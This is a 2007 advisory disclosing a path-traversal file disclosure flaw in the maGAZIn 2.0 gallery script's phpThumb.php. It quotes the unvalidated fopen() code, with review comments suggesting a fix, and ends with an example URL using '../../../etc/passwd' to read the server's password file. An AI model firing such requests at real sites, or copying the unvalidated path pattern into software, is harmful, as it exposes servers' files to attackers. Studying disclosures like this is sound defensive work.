# Title : maGAZIn 2.0 (phpThumb.php src) Remote File Disclosure Vulnerability
# Published : 2007-05-11
# Author : Dj7xpl
\|///
\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ Dj7xpl@yahoo.com ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
( ) /
_) (_/
---------------------------------------------------------------------
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
---------------------------------------------------------------------
---------------------------------------------------------------------
Vuln Code : phpThumb.php, lines 152 - 157
[Code]
// Excerpt as quoted by the advisory (lines 152-157 of the affected script).
// The request parameter 'src' is appended to DOCUMENT_ROOT as-is: nothing in
// these lines normalises the path, strips "../" segments, or restricts it to
// an image directory, so the requester decides which file is opened and read.
// NOTE(review): the usual fix is to canonicalise the joined path (realpath())
// and reject it unless the result still lies under the intended image
// directory; an allow-list of image extensions is a further hardening step.
// The '@' suppresses fopen() warnings, so a failed open raises no PHP warning here.
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
// Reads the whole file in one call; the length comes from a second filesystem
// lookup on the same unvalidated path. What is done with the bytes afterwards
// is outside this excerpt.
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
// The message passed on contains the full server-side path built from the
// request value; presumably ErrorImage() renders it to the client, which
// would also reveal the document root. Confirm in ErrorImage()'s definition.
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]
---------------------------------------------------------------------
---------------------------------------------------------------------
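Bug : src is joined to DOCUMENT_ROOT without any validation, so a relative path containing ../ is opened and read from outside the web root :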
http://[Target]/[Path]/phpThumb.php?src=[Local File]
Example :
http://Target.ir/Gallery/phpThumb.php?src=../../../etc/passwd
---------------------------------------------------------------------